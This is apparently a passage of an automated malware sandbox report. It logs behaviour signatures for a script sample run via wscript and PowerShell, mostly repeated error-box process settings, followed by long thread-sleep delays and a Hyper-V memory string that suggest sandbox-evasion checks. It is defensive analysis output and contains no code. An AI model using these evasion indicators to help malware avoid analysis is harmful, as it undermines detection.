      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1139Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2219Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4861Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4920Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1853Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1289Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 4861 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 4920 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep time: -17524406870024063s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 1853 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 1289 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000002.1730496254.000002256594B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725442998.00000225658F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.00000225658FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730496254.00000225658FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725442998.000002256594B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.000002256594B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
